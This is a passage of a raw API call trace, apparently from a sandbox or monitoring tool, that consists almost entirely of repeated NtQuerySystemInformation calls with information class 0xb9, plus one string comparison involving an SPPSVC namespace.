(SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0283.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0283.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0283.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0283.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0283.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x50, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0283.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.270] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb8, Length=0x50, ResultLength=0x0) [0283.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) 